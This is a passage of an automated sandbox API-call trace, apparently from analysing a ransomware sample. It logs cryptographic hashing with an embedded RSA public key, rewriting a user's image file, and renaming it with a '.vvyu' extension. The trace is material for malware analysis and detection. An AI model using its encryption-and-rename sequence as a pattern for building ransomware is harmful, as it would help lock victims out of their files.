KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.268] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.269] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.269] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.269] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.270] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.270] GetLastError () returned 0x0 [0193.270] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.270] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.270] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.270] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.270] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9940) returned 0x2d49778 [0193.271] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41f08 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41f50 [0193.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.272] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39eb0 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39e98 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.275] GetCurrentThreadId () returned 0x264 [0193.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45a60 [0193.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.276] GetCurrentThreadId () returned 0x264 [0193.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39eb0 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f10 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f28 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ec8 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e98 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41f50 | out: hHeap=0x6a0000) returned 1 [0193.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.288] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x9938, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x9938, lpOverlapped=0x0) returned 1 [0193.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.289] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x993d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.289] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.290] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.291] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.291] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.291] CloseHandle (hObject=0x584) returned 1 [0193.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0193.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d49778 [0193.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0193.293] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\lbmw DOKXEH2om_f.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\lbmw dokxeh2om_f.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\lbmw DOKXEH2om_f.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\lbmw dokxeh2om_f.gif.vvyu")) returned 1 [0193.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.295] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.298] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe97d0e20, ftCreationTime.dwHighDateTime=0x1d8a167, ftLastAccessTime.dwLowDateTime=0x232660f0, ftLastAccessTime.dwHighDateTime=0x1d8a4a0, ftLastWriteTime.dwLowDateTime=0x232660f0, ftLastWriteTime.dwHighDateTime=0x1d8a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x993d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lbmw DOKXEH2om_f.gif", cAlternateFileName="LBMWDO~1.GIF")) returned 0 [0193.298] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0193.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.299] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0193.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.299] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0193.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 